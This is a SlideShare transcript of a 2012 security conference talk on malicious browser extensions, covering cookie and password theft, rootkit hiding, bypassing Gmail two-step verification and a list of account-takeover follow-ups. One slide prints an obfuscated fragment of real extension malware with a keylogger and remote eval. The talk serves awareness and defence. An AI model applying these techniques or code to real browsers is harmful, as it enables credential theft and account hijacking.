SlideShare a Scribd company logo

[ENG] Hacker halted 2012 - Zombie browsers, spiced with rootkit extensions

Zoltan Balazs
Zoltan Balazs

This document summarizes a presentation about malicious browser extensions and rootkits. It discusses the history of malicious extensions for Firefox, Chrome, and Safari. It demonstrates how to create a homemade Firefox extension that can steal cookies and passwords, upload/download files, and execute binaries remotely without user interaction. The presentation notes risks of zombie browsers include bypassing firewalls/filtering and accessing all browser secrets. It also demonstrates defeating 2-factor authentication on Gmail and hacking ChromeOS, though the latter demo did not work due to security restrictions. The document concludes by calling on antivirus companies to improve extension detection, browser companies to restrict extensions further, and users to use separate systems for banking.

Technology
1 of 51
Download to read offline
Introduction Zoltán Balázs ITSEC consultant Deloitte Hungary Instructor @NetAkademia.hu OSCP, CISSP, C|HFI, CPTS, MCP http://www.slideshare.net/bz98 Cyberlympics finals 2012 - 2nd runner up Member of the gula.sh team
I love Hacking
I love Zombie movies
I love LOLcats
Zombies + Hacking + LOLcats = I R ZOMBIE BROWSER
Zombie browsers, spiced with rootkit extensions Hacker Halted 2012 • Legal disclaimer: • Every point of views and thoughts are mine. • The next presentation’s contents do not have any connection with my employers opinion, whether past, present or future. • What you will hear can be only used in test labs, and only for the good.
About:presentation • History of malicious extensions (add-on, plug-in, extension, BHO) • Focus on Firefox, Chrome, Safari • Advantages – disadvantages • Browser extension rootkits • Live demo – home made extension
History of malicious Firefox extensions • 90% of malicious extensions were created for Facebook spamming • 2004-2010: 5 • 2011: 5 • Jan 01, 2012 – Oct 23, 2012: 49* *Data from mozilla.org
More examples on Facecrook Text ©f-secure
My zombie extension • Command and Control • Stealing cookies, passwords • Uploading/downloading files (Firefox, Chrome NPAPI on todo list) • Binary execution (Firefox - Windows, Chrome NPAPI on todo list) • Geolocation
Safari demo
Installing the extension Physical access Social Engineering Remote code execution – without user interaction
Firefox rootkit 1 • Hook into other extension (even signed ones)
Firefox rootkit 2 • visible = false
Firefox rootkit 3 • seen in the wild
Quick Quiz - for Hacker Pschorr
Quick Quiz • Which company developed the first Netscape plugin? • *****
Quick Quiz • Which company developed the first Netscape plugin? • A***e
Quick Quiz • Which company developed the first Netscape plugin? • Adobe in 1995
Risks of a Zombie Browser • Eats your brain while you are asleep
Risks of a Zombie Browser
Risks of a Zombie Browser • Firewall/proxy  • Local firewall  • Application whitelisting  • Web-filtering 
Risks of a Zombie Browser • Cross-platform  • Cross-domain Universal XSS  • Every secret is available  • Password input method does not matter (password safe, virtual keyboard, etc.) • Before SSL (+JS obfuscation) • Malicious source codes are available  • Advantage against meterpreter  • exe/dll is not needed for persistence • Writing into registry is not needed
Risks of a zombie browser • Low AV signature based detection rate  • Sample from January 2011. – October 2012. 0/40 • Extension vs. behavioral based detection 
Risks of a zombie browser • Low AV signature based detection rate  • Sample from January 2011. – October 2012. 0/40 • Extension vs. behavioral based detection 
Friendly message to AV developers: try harder… Code snippets from undetected malicious browser extension var _0x39fe=["x73x63x72x69x70x74","x63x72x65x61x74x65 x45x6Cx65x6Dx65x6E x74","x74x79x70x65","x74x65x78x74… _0xaed4=[_0x39fe[0],_0x39fe[1],_0x39fe[2],_0x39fe[3],_0x39fe[4],_0x39f e[5],_0x39fe[6],_0x39fe[7],_0x39fe[8],_0x39fe[9]]; keylogger_namespace.keylogger… for(var x in mothership){if (mothership[x].command == "eval") {eval(mothership[x].data);
Profit ...
Firefox
Disadvantages (for the Hacker) • Not a real rootkit • Browser limitations (eg. portscan) • Platform limitations (eg. Execute binary code only on Windows) • Runs in user space • Runs only when browser is open • Extensions are not yet supported in: • Chrome on Android/iOS • Safari on iOS
Gmail demo • defeat 2 step verification • Why Google? • Hacking “the others” is boring • clear text cookies • missing 2 step verification • no concurrent session detection
Gmail demo • defeat 2 step verification
One to rule them all • Cookie + password stealing – defeat Google 2-step verification • Use password reset on other sites linked to G-mail (Paypal, etc.) • Install any app from Google Play to victim’s Android phone • Access Android WIFI passwords • Access to Google+, Docs, Picasa, Blogger, Contacts, Web history, Checkout, Apps, OpenID • Backdooring Google account • Adding application specific password • Stealing backup codes • G-mail mail forward rule
Chrome - rootkit
ChromeOS DEMO
ChromeOS DEMO Not today :-( no extension install from 3rd party site no Flash, no Java, no NPAPI
ChromeOS DEMO Not today :-( no extension install from 3rd party site no Flash, no Java, no NPAPI
Zombie Android DEMO • Android SQLite Journal Information Disclosure (CVE-2011-3901) • Android 2.3.7
Firefox webcam
Browser extensions might be bad • @antivirus developers • Be reactive • The browser is the new OS • @browser developers (Mozilla) • Default deny installing extensions from 3rd-party sites • Chrome-level security • Require permissions • Extension components – separate privileges • @browser developers (Google) – keep on the good job • but disable NPAPI :)
Browser extensions might be bad • @website developers • There is no prevention against password stealing • Cookie-stealing • Restrict session to IP (by default) • @users • Beware of malicious browser extensions • Use separated OS for e-banking and other sensitive stuff • Removing malicious extensions - create new clean profile in clean OS • @companies • Control which browsers users can use • Restrict extensions via GPO
One more thing ...
Should I release it on GitHub?
References • Grégoire Gentil: Hack any website, 2003 • Christophe Devaux, Julien Lenoir: Browser rootkits, 2008 • Duarte Silva: Firefox FFSpy PoC, 2008 • Andreas Grech: Stealing login details with a Google Chrome extension, 2010 • Matt Johansen, Kyle Osborn: Hacking Google ChromeOS, 2011 • Nicolas Paglieri: Attacking Web Browsers, 2012
Browser extensions might be bad, Mmmkay??? zbalazs@deloittece.com zbalazs4 hu.linkedin.com/in/zbalazs Code released(?) under GPL http://github.com/Z6543/ ZombieBrowserPack Greetz to @hekkcamp

Recommended

MIPS-X
MIPS-XMIPS-X
MIPS-X
Zoltan Balazs
 
Qubes os presentation_to_clug_20150727
Qubes os presentation_to_clug_20150727Qubes os presentation_to_clug_20150727
Qubes os presentation_to_clug_20150727
csirac2
 
Intro To Gentoo Embedded Cclug
Intro To Gentoo Embedded CclugIntro To Gentoo Embedded Cclug
Intro To Gentoo Embedded Cclug
Steve Arnold
 
Hands on Virtualization with Ganeti
Hands on Virtualization with GanetiHands on Virtualization with Ganeti
Hands on Virtualization with Ganeti
OSCON Byrum
 
Gentoo Linux, or Why in the World You Should Compile Everything
Gentoo Linux, or Why in the World You Should Compile EverythingGentoo Linux, or Why in the World You Should Compile Everything
Gentoo Linux, or Why in the World You Should Compile Everything
Donnie Berkholz
 
[DockerCon 2019] Hardening Docker daemon with Rootless mode
[DockerCon 2019] Hardening Docker daemon with Rootless mode[DockerCon 2019] Hardening Docker daemon with Rootless mode
[DockerCon 2019] Hardening Docker daemon with Rootless mode
Akihiro Suda
 
QNAP COSCUP Container Station
QNAP COSCUP Container StationQNAP COSCUP Container Station
QNAP COSCUP Container Station
Wu Fan-Cheng
 
[KubeConUS2019 Docker, Inc. Booth] Distributed Builds on Kubernetes with Bui...
[KubeConUS2019 Docker, Inc. Booth] Distributed Builds on Kubernetes with Bui... [KubeConUS2019 Docker, Inc. Booth] Distributed Builds on Kubernetes with Bui...
[KubeConUS2019 Docker, Inc. Booth] Distributed Builds on Kubernetes with Bui...
Akihiro Suda
 

Recommended

MIPS-X
MIPS-XMIPS-X
MIPS-X
Zoltan Balazs
 
Qubes os presentation_to_clug_20150727
Qubes os presentation_to_clug_20150727Qubes os presentation_to_clug_20150727
Qubes os presentation_to_clug_20150727
csirac2
 
Intro To Gentoo Embedded Cclug
Intro To Gentoo Embedded CclugIntro To Gentoo Embedded Cclug
Intro To Gentoo Embedded Cclug
Steve Arnold
 
Hands on Virtualization with Ganeti
Hands on Virtualization with GanetiHands on Virtualization with Ganeti
Hands on Virtualization with Ganeti
OSCON Byrum
 
Gentoo Linux, or Why in the World You Should Compile Everything
Gentoo Linux, or Why in the World You Should Compile EverythingGentoo Linux, or Why in the World You Should Compile Everything
Gentoo Linux, or Why in the World You Should Compile Everything
Donnie Berkholz
 
[DockerCon 2019] Hardening Docker daemon with Rootless mode
[DockerCon 2019] Hardening Docker daemon with Rootless mode[DockerCon 2019] Hardening Docker daemon with Rootless mode
[DockerCon 2019] Hardening Docker daemon with Rootless mode
Akihiro Suda
 
QNAP COSCUP Container Station
QNAP COSCUP Container StationQNAP COSCUP Container Station
QNAP COSCUP Container Station
Wu Fan-Cheng
 
[KubeConUS2019 Docker, Inc. Booth] Distributed Builds on Kubernetes with Bui...
[KubeConUS2019 Docker, Inc. Booth] Distributed Builds on Kubernetes with Bui... [KubeConUS2019 Docker, Inc. Booth] Distributed Builds on Kubernetes with Bui...
[KubeConUS2019 Docker, Inc. Booth] Distributed Builds on Kubernetes with Bui...
Akihiro Suda
 
OpenWRT and Perl
OpenWRT and PerlOpenWRT and Perl
OpenWRT and Perl
Dean Hamstead
 
Qt5 (minimal) on beaglebone, with Yocto
Qt5 (minimal) on beaglebone, with YoctoQt5 (minimal) on beaglebone, with Yocto
Qt5 (minimal) on beaglebone, with Yocto
Prabindh Sundareson
 
How to Connect MQTT Broker on ESP8266 WiFi
How to Connect MQTT Broker on ESP8266 WiFiHow to Connect MQTT Broker on ESP8266 WiFi
How to Connect MQTT Broker on ESP8266 WiFi
Naoto MATSUMOTO
 
OpenWRT guide and memo
OpenWRT guide and memoOpenWRT guide and memo
OpenWRT guide and memo
家榮 吳
 
[DockerCon 2020] Hardening Docker daemon with Rootless Mode
[DockerCon 2020] Hardening Docker daemon with Rootless Mode[DockerCon 2020] Hardening Docker daemon with Rootless Mode
[DockerCon 2020] Hardening Docker daemon with Rootless Mode
Akihiro Suda
 
FreeBSD hosting
FreeBSD hostingFreeBSD hosting
FreeBSD hosting
punkt.de GmbH
 
Stealthy, Hypervisor-based Malware Analysis
Stealthy, Hypervisor-based Malware AnalysisStealthy, Hypervisor-based Malware Analysis
Stealthy, Hypervisor-based Malware Analysis
Tamas K Lengyel
 
Олег Купреев «Уязвимости программного обеспечения телекоммуникационного обору...
Олег Купреев «Уязвимости программного обеспечения телекоммуникационного обору...Олег Купреев «Уязвимости программного обеспечения телекоммуникационного обору...
Олег Купреев «Уязвимости программного обеспечения телекоммуникационного обору...
Mail.ru Group
 
Making Gentoo Tick
Making Gentoo TickMaking Gentoo Tick
Making Gentoo Tick
Anant Narayanan
 
moscmy2016: Extending Docker
moscmy2016: Extending Dockermoscmy2016: Extending Docker
moscmy2016: Extending Docker
Mohammad Fairus Khalid
 
How to be a distribution-friendly project
How to be a distribution-friendly projectHow to be a distribution-friendly project
How to be a distribution-friendly project
Donnie Berkholz
 
Yocto usage for Graphics SDK on AM335x
Yocto usage for Graphics SDK on AM335xYocto usage for Graphics SDK on AM335x
Yocto usage for Graphics SDK on AM335x
Prabindh Sundareson
 
Is Rust Programming ready for embedded development?
Is Rust Programming ready for embedded development?Is Rust Programming ready for embedded development?
Is Rust Programming ready for embedded development?
Knoldus Inc.
 
SmartOS Primer
SmartOS PrimerSmartOS Primer
SmartOS Primer
Daniele Stroppa
 
Demystifying docker networking black magic - Lorenzo Fontana, Kiratech
Demystifying docker networking black magic - Lorenzo Fontana, KiratechDemystifying docker networking black magic - Lorenzo Fontana, Kiratech
Demystifying docker networking black magic - Lorenzo Fontana, Kiratech
Codemotion Tel Aviv
 
This one goes to 11!
This one goes to 11!This one goes to 11!
This one goes to 11!
APNIC
 
[Paris Container Day 2021] nerdctl: yet another Docker & Docker Compose imple...
[Paris Container Day 2021] nerdctl: yet another Docker & Docker Compose imple...[Paris Container Day 2021] nerdctl: yet another Docker & Docker Compose imple...
[Paris Container Day 2021] nerdctl: yet another Docker & Docker Compose imple...
Akihiro Suda
 
openSUSE12.2 Review
openSUSE12.2 ReviewopenSUSE12.2 Review
openSUSE12.2 ReviewSUSE Labs Taipei
 
LCE13: Virtualization Forum
LCE13: Virtualization ForumLCE13: Virtualization Forum
LCE13: Virtualization Forum
Linaro
 
4 virtual router CloudStack Developer Day
4 virtual router CloudStack Developer Day4 virtual router CloudStack Developer Day
4 virtual router CloudStack Developer Day
Kimihiko Kitase
 
Hacking Windows 95 #33c3
Hacking Windows 95 #33c3Hacking Windows 95 #33c3
Hacking Windows 95 #33c3
Zoltan Balazs
 
[HUN] Zombi tűzróka, avagy mire képes egy rosszindulatú böngősző kiegészitő
[HUN] Zombi tűzróka, avagy mire képes egy rosszindulatú böngősző kiegészitő[HUN] Zombi tűzróka, avagy mire képes egy rosszindulatú böngősző kiegészitő
[HUN] Zombi tűzróka, avagy mire képes egy rosszindulatú böngősző kiegészitő
Zoltan Balazs
 

More Related Content

What's hot

OpenWRT and Perl
OpenWRT and PerlOpenWRT and Perl
OpenWRT and Perl
Dean Hamstead
 
Qt5 (minimal) on beaglebone, with Yocto
Qt5 (minimal) on beaglebone, with YoctoQt5 (minimal) on beaglebone, with Yocto
Qt5 (minimal) on beaglebone, with Yocto
Prabindh Sundareson
 
How to Connect MQTT Broker on ESP8266 WiFi
How to Connect MQTT Broker on ESP8266 WiFiHow to Connect MQTT Broker on ESP8266 WiFi
How to Connect MQTT Broker on ESP8266 WiFi
Naoto MATSUMOTO
 
OpenWRT guide and memo
OpenWRT guide and memoOpenWRT guide and memo
OpenWRT guide and memo
家榮 吳
 
[DockerCon 2020] Hardening Docker daemon with Rootless Mode
[DockerCon 2020] Hardening Docker daemon with Rootless Mode[DockerCon 2020] Hardening Docker daemon with Rootless Mode
[DockerCon 2020] Hardening Docker daemon with Rootless Mode
Akihiro Suda
 
FreeBSD hosting
FreeBSD hostingFreeBSD hosting
FreeBSD hosting
punkt.de GmbH
 
Stealthy, Hypervisor-based Malware Analysis
Stealthy, Hypervisor-based Malware AnalysisStealthy, Hypervisor-based Malware Analysis
Stealthy, Hypervisor-based Malware Analysis
Tamas K Lengyel
 
Олег Купреев «Уязвимости программного обеспечения телекоммуникационного обору...
Олег Купреев «Уязвимости программного обеспечения телекоммуникационного обору...Олег Купреев «Уязвимости программного обеспечения телекоммуникационного обору...
Олег Купреев «Уязвимости программного обеспечения телекоммуникационного обору...
Mail.ru Group
 
Making Gentoo Tick
Making Gentoo TickMaking Gentoo Tick
Making Gentoo Tick
Anant Narayanan
 
moscmy2016: Extending Docker
moscmy2016: Extending Dockermoscmy2016: Extending Docker
moscmy2016: Extending Docker
Mohammad Fairus Khalid
 
How to be a distribution-friendly project
How to be a distribution-friendly projectHow to be a distribution-friendly project
How to be a distribution-friendly project
Donnie Berkholz
 
Yocto usage for Graphics SDK on AM335x
Yocto usage for Graphics SDK on AM335xYocto usage for Graphics SDK on AM335x
Yocto usage for Graphics SDK on AM335x
Prabindh Sundareson
 
Is Rust Programming ready for embedded development?
Is Rust Programming ready for embedded development?Is Rust Programming ready for embedded development?
Is Rust Programming ready for embedded development?
Knoldus Inc.
 
SmartOS Primer
SmartOS PrimerSmartOS Primer
SmartOS Primer
Daniele Stroppa
 
Demystifying docker networking black magic - Lorenzo Fontana, Kiratech
Demystifying docker networking black magic - Lorenzo Fontana, KiratechDemystifying docker networking black magic - Lorenzo Fontana, Kiratech
Demystifying docker networking black magic - Lorenzo Fontana, Kiratech
Codemotion Tel Aviv
 
This one goes to 11!
This one goes to 11!This one goes to 11!
This one goes to 11!
APNIC
 
[Paris Container Day 2021] nerdctl: yet another Docker & Docker Compose imple...
[Paris Container Day 2021] nerdctl: yet another Docker & Docker Compose imple...[Paris Container Day 2021] nerdctl: yet another Docker & Docker Compose imple...
[Paris Container Day 2021] nerdctl: yet another Docker & Docker Compose imple...
Akihiro Suda
 
LCE13: Virtualization Forum
LCE13: Virtualization ForumLCE13: Virtualization Forum
LCE13: Virtualization Forum
Linaro
 
4 virtual router CloudStack Developer Day
4 virtual router CloudStack Developer Day4 virtual router CloudStack Developer Day
4 virtual router CloudStack Developer Day
Kimihiko Kitase
 

What's hot (20)

OpenWRT and Perl
OpenWRT and PerlOpenWRT and Perl
OpenWRT and Perl
 
Qt5 (minimal) on beaglebone, with Yocto
Qt5 (minimal) on beaglebone, with YoctoQt5 (minimal) on beaglebone, with Yocto
Qt5 (minimal) on beaglebone, with Yocto
 
How to Connect MQTT Broker on ESP8266 WiFi
How to Connect MQTT Broker on ESP8266 WiFiHow to Connect MQTT Broker on ESP8266 WiFi
How to Connect MQTT Broker on ESP8266 WiFi
 
OpenWRT guide and memo
OpenWRT guide and memoOpenWRT guide and memo
OpenWRT guide and memo
 
[DockerCon 2020] Hardening Docker daemon with Rootless Mode
[DockerCon 2020] Hardening Docker daemon with Rootless Mode[DockerCon 2020] Hardening Docker daemon with Rootless Mode
[DockerCon 2020] Hardening Docker daemon with Rootless Mode
 
FreeBSD hosting
FreeBSD hostingFreeBSD hosting
FreeBSD hosting
 
Stealthy, Hypervisor-based Malware Analysis
Stealthy, Hypervisor-based Malware AnalysisStealthy, Hypervisor-based Malware Analysis
Stealthy, Hypervisor-based Malware Analysis
 
Олег Купреев «Уязвимости программного обеспечения телекоммуникационного обору...
Олег Купреев «Уязвимости программного обеспечения телекоммуникационного обору...Олег Купреев «Уязвимости программного обеспечения телекоммуникационного обору...
Олег Купреев «Уязвимости программного обеспечения телекоммуникационного обору...
 
Making Gentoo Tick
Making Gentoo TickMaking Gentoo Tick
Making Gentoo Tick
 
moscmy2016: Extending Docker
moscmy2016: Extending Dockermoscmy2016: Extending Docker
moscmy2016: Extending Docker
 
How to be a distribution-friendly project
How to be a distribution-friendly projectHow to be a distribution-friendly project
How to be a distribution-friendly project
 
Yocto usage for Graphics SDK on AM335x
Yocto usage for Graphics SDK on AM335xYocto usage for Graphics SDK on AM335x
Yocto usage for Graphics SDK on AM335x
 
Is Rust Programming ready for embedded development?
Is Rust Programming ready for embedded development?Is Rust Programming ready for embedded development?
Is Rust Programming ready for embedded development?
 
SmartOS Primer
SmartOS PrimerSmartOS Primer
SmartOS Primer
 
Demystifying docker networking black magic - Lorenzo Fontana, Kiratech
Demystifying docker networking black magic - Lorenzo Fontana, KiratechDemystifying docker networking black magic - Lorenzo Fontana, Kiratech
Demystifying docker networking black magic - Lorenzo Fontana, Kiratech
 
This one goes to 11!
This one goes to 11!This one goes to 11!
This one goes to 11!
 
[Paris Container Day 2021] nerdctl: yet another Docker & Docker Compose imple...
[Paris Container Day 2021] nerdctl: yet another Docker & Docker Compose imple...[Paris Container Day 2021] nerdctl: yet another Docker & Docker Compose imple...
[Paris Container Day 2021] nerdctl: yet another Docker & Docker Compose imple...
 
openSUSE12.2 Review
openSUSE12.2 ReviewopenSUSE12.2 Review
openSUSE12.2 Review
 
LCE13: Virtualization Forum
LCE13: Virtualization ForumLCE13: Virtualization Forum
LCE13: Virtualization Forum
 
4 virtual router CloudStack Developer Day
4 virtual router CloudStack Developer Day4 virtual router CloudStack Developer Day
4 virtual router CloudStack Developer Day
 

Viewers also liked

Hacking Windows 95 #33c3
Hacking Windows 95 #33c3Hacking Windows 95 #33c3
Hacking Windows 95 #33c3
Zoltan Balazs
 
[HUN] Zombi tűzróka, avagy mire képes egy rosszindulatú böngősző kiegészitő
[HUN] Zombi tűzróka, avagy mire képes egy rosszindulatú böngősző kiegészitő[HUN] Zombi tűzróka, avagy mire képes egy rosszindulatú böngősző kiegészitő
[HUN] Zombi tűzróka, avagy mire képes egy rosszindulatú böngősző kiegészitő
Zoltan Balazs
 
[ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012
[ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012[ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012
[ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012Zoltan Balazs
 
[HUN] Hacktivity2009 - M&M’s: Mafia & Malware’s
[HUN] Hacktivity2009 - M&M’s: Mafia & Malware’s[HUN] Hacktivity2009 - M&M’s: Mafia & Malware’s
[HUN] Hacktivity2009 - M&M’s: Mafia & Malware’s
Zoltan Balazs
 
Sandboxes
SandboxesSandboxes
Sandboxes
Zoltan Balazs
 
[ENG] IPv6 shipworm + My little Windows domain pwnie
[ENG] IPv6 shipworm + My little Windows domain pwnie[ENG] IPv6 shipworm + My little Windows domain pwnie
[ENG] IPv6 shipworm + My little Windows domain pwnie
Zoltan Balazs
 
[ENG] OHM2013 - The Quest for the Client-Side Elixir Against Zombie Browsers -
[ENG] OHM2013 - The Quest for the Client-Side Elixir Against Zombie Browsers - [ENG] OHM2013 - The Quest for the Client-Side Elixir Against Zombie Browsers -
[ENG] OHM2013 - The Quest for the Client-Side Elixir Against Zombie Browsers - Zoltan Balazs
 
Sandbox detection: leak, abuse, test - Hacktivity 2015
Sandbox detection: leak, abuse, test - Hacktivity 2015Sandbox detection: leak, abuse, test - Hacktivity 2015
Sandbox detection: leak, abuse, test - Hacktivity 2015
Zoltan Balazs
 
[ENG] Hacktivity 2013 - Alice in eXploitland
[ENG] Hacktivity 2013 - Alice in eXploitland[ENG] Hacktivity 2013 - Alice in eXploitland
[ENG] Hacktivity 2013 - Alice in eXploitland
Zoltan Balazs
 
[HUN] Védtelen böngészők - Ethical Hacking
[HUN] Védtelen böngészők - Ethical Hacking [HUN] Védtelen böngészők - Ethical Hacking
[HUN] Védtelen böngészők - Ethical Hacking Zoltan Balazs
 
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
Zoltan Balazs
 
IoT security is a nightmare. But what is the real risk?
IoT security is a nightmare. But what is the real risk?IoT security is a nightmare. But what is the real risk?
IoT security is a nightmare. But what is the real risk?
Zoltan Balazs
 
Hacking with Remote Admin Tools (RAT)
Hacking with Remote Admin Tools (RAT) Hacking with Remote Admin Tools (RAT)
Hacking with Remote Admin Tools (RAT)
Zoltan Balazs
 
Hacktivity 2016: The real risks of the IoT security-nightmare: Hacking IP cam...
Hacktivity 2016: The real risks of the IoT security-nightmare: Hacking IP cam...Hacktivity 2016: The real risks of the IoT security-nightmare: Hacking IP cam...
Hacktivity 2016: The real risks of the IoT security-nightmare: Hacking IP cam...
Zoltan Balazs
 
Ransomware - what is it, how to protect against it
Ransomware - what is it, how to protect against itRansomware - what is it, how to protect against it
Ransomware - what is it, how to protect against it
Zoltan Balazs
 

Viewers also liked (15)

Hacking Windows 95 #33c3
Hacking Windows 95 #33c3Hacking Windows 95 #33c3
Hacking Windows 95 #33c3
 
[HUN] Zombi tűzróka, avagy mire képes egy rosszindulatú böngősző kiegészitő
[HUN] Zombi tűzróka, avagy mire képes egy rosszindulatú böngősző kiegészitő[HUN] Zombi tűzróka, avagy mire képes egy rosszindulatú böngősző kiegészitő
[HUN] Zombi tűzróka, avagy mire képes egy rosszindulatú böngősző kiegészitő
 
[ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012
[ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012[ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012
[ENG] Zombie browsers spiced with rootkit extensions - Hacktivity 2012
 
[HUN] Hacktivity2009 - M&M’s: Mafia & Malware’s
[HUN] Hacktivity2009 - M&M’s: Mafia & Malware’s[HUN] Hacktivity2009 - M&M’s: Mafia & Malware’s
[HUN] Hacktivity2009 - M&M’s: Mafia & Malware’s
 
Sandboxes
SandboxesSandboxes
Sandboxes
 
[ENG] IPv6 shipworm + My little Windows domain pwnie
[ENG] IPv6 shipworm + My little Windows domain pwnie[ENG] IPv6 shipworm + My little Windows domain pwnie
[ENG] IPv6 shipworm + My little Windows domain pwnie
 
[ENG] OHM2013 - The Quest for the Client-Side Elixir Against Zombie Browsers -
[ENG] OHM2013 - The Quest for the Client-Side Elixir Against Zombie Browsers - [ENG] OHM2013 - The Quest for the Client-Side Elixir Against Zombie Browsers -
[ENG] OHM2013 - The Quest for the Client-Side Elixir Against Zombie Browsers -
 
Sandbox detection: leak, abuse, test - Hacktivity 2015
Sandbox detection: leak, abuse, test - Hacktivity 2015Sandbox detection: leak, abuse, test - Hacktivity 2015
Sandbox detection: leak, abuse, test - Hacktivity 2015
 
[ENG] Hacktivity 2013 - Alice in eXploitland
[ENG] Hacktivity 2013 - Alice in eXploitland[ENG] Hacktivity 2013 - Alice in eXploitland
[ENG] Hacktivity 2013 - Alice in eXploitland
 
[HUN] Védtelen böngészők - Ethical Hacking
[HUN] Védtelen böngészők - Ethical Hacking [HUN] Védtelen böngészők - Ethical Hacking
[HUN] Védtelen böngészők - Ethical Hacking
 
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
 
IoT security is a nightmare. But what is the real risk?
IoT security is a nightmare. But what is the real risk?IoT security is a nightmare. But what is the real risk?
IoT security is a nightmare. But what is the real risk?
 
Hacking with Remote Admin Tools (RAT)
Hacking with Remote Admin Tools (RAT) Hacking with Remote Admin Tools (RAT)
Hacking with Remote Admin Tools (RAT)
 
Hacktivity 2016: The real risks of the IoT security-nightmare: Hacking IP cam...
Hacktivity 2016: The real risks of the IoT security-nightmare: Hacking IP cam...Hacktivity 2016: The real risks of the IoT security-nightmare: Hacking IP cam...
Hacktivity 2016: The real risks of the IoT security-nightmare: Hacking IP cam...
 
Ransomware - what is it, how to protect against it
Ransomware - what is it, how to protect against itRansomware - what is it, how to protect against it
Ransomware - what is it, how to protect against it
 

Similar to [ENG] Hacker halted 2012 - Zombie browsers, spiced with rootkit extensions

Zombie browsers spiced with rootkit extensions - DefCamp 2012
Zombie browsers spiced with rootkit extensions - DefCamp 2012Zombie browsers spiced with rootkit extensions - DefCamp 2012
Zombie browsers spiced with rootkit extensions - DefCamp 2012DefCamp
 
Thinking Outside the Sand[box]
Thinking Outside the Sand[box]Thinking Outside the Sand[box]
Thinking Outside the Sand[box]
Juniper Networks
 
Html5: Something wicked this way comes (Hack in Paris)
Html5: Something wicked this way comes (Hack in Paris)Html5: Something wicked this way comes (Hack in Paris)
Html5: Something wicked this way comes (Hack in Paris)
Krzysztof Kotowicz
 
Metasploitation part-1 (murtuja)
Metasploitation part-1 (murtuja)Metasploitation part-1 (murtuja)
Metasploitation part-1 (murtuja)
ClubHack
 
CSW2017 Geshev+Miller logic bug hunting in chrome on android
CSW2017 Geshev+Miller logic bug hunting in chrome on androidCSW2017 Geshev+Miller logic bug hunting in chrome on android
CSW2017 Geshev+Miller logic bug hunting in chrome on android
CanSecWest
 
Krzysztof kotowicz. something wicked this way comes
Krzysztof kotowicz. something wicked this way comesKrzysztof kotowicz. something wicked this way comes
Krzysztof kotowicz. something wicked this way comesYury Chemerkin
 
Something wicked this way comes - CONFidence
Something wicked this way comes - CONFidenceSomething wicked this way comes - CONFidence
Something wicked this way comes - CONFidence
Krzysztof Kotowicz
 
External JavaScript Widget Development Best Practices
External JavaScript Widget Development Best PracticesExternal JavaScript Widget Development Best Practices
External JavaScript Widget Development Best Practices
Volkan Özçelik
 
Java scriptwidgetdevelopmentjstanbul2012
Java scriptwidgetdevelopmentjstanbul2012Java scriptwidgetdevelopmentjstanbul2012
Java scriptwidgetdevelopmentjstanbul2012Volkan Özçelik
 
Forensics WS Consolidated
Forensics WS ConsolidatedForensics WS Consolidated
Forensics WS ConsolidatedKarter Rohrer
 
Алексей Старов - Как проводить киберраследования?
Алексей Старов - Как проводить киберраследования?Алексей Старов - Как проводить киберраследования?
Алексей Старов - Как проводить киберраследования?
HackIT Ukraine
 
External JavaScript Widget Development Best Practices (updated) (v.1.1)
External JavaScript Widget Development Best Practices (updated) (v.1.1) External JavaScript Widget Development Best Practices (updated) (v.1.1)
External JavaScript Widget Development Best Practices (updated) (v.1.1)
Volkan Özçelik
 
Web Security - Introduction
Web Security - IntroductionWeb Security - Introduction
Web Security - Introduction
SQALab
 
Web Security - Introduction v.1.3
Web Security - Introduction v.1.3Web Security - Introduction v.1.3
Web Security - Introduction v.1.3
Oles Seheda
 
Web-App Remote Code Execution Via Scripting Engines
Web-App Remote Code Execution Via Scripting EnginesWeb-App Remote Code Execution Via Scripting Engines
Web-App Remote Code Execution Via Scripting Engines
c0c0n - International Cyber Security and Policing Conference
 
CheckPoint: Anatomy of an evolving bot
CheckPoint: Anatomy of an evolving botCheckPoint: Anatomy of an evolving bot
CheckPoint: Anatomy of an evolving bot
Group of company MUK
 
JavaOne 2014 Security Testing for Developers using OWASP ZAP
JavaOne 2014 Security Testing for Developers using OWASP ZAPJavaOne 2014 Security Testing for Developers using OWASP ZAP
JavaOne 2014 Security Testing for Developers using OWASP ZAP
Simon Bennetts
 
Malware Analysis For The Enterprise
Malware Analysis For The EnterpriseMalware Analysis For The Enterprise
Malware Analysis For The Enterprise
Jason Ross
 
DEEPSEC 2013: Malware Datamining And Attribution
DEEPSEC 2013: Malware Datamining And AttributionDEEPSEC 2013: Malware Datamining And Attribution
DEEPSEC 2013: Malware Datamining And Attribution
Michael Boman
 

Similar to [ENG] Hacker halted 2012 - Zombie browsers, spiced with rootkit extensions (20)

Hacktivityonly 121013141039-phpapp02
Hacktivityonly 121013141039-phpapp02Hacktivityonly 121013141039-phpapp02
Hacktivityonly 121013141039-phpapp02
 
Zombie browsers spiced with rootkit extensions - DefCamp 2012
Zombie browsers spiced with rootkit extensions - DefCamp 2012Zombie browsers spiced with rootkit extensions - DefCamp 2012
Zombie browsers spiced with rootkit extensions - DefCamp 2012
 
Thinking Outside the Sand[box]
Thinking Outside the Sand[box]Thinking Outside the Sand[box]
Thinking Outside the Sand[box]
 
Html5: Something wicked this way comes (Hack in Paris)
Html5: Something wicked this way comes (Hack in Paris)Html5: Something wicked this way comes (Hack in Paris)
Html5: Something wicked this way comes (Hack in Paris)
 
Metasploitation part-1 (murtuja)
Metasploitation part-1 (murtuja)Metasploitation part-1 (murtuja)
Metasploitation part-1 (murtuja)
 
CSW2017 Geshev+Miller logic bug hunting in chrome on android
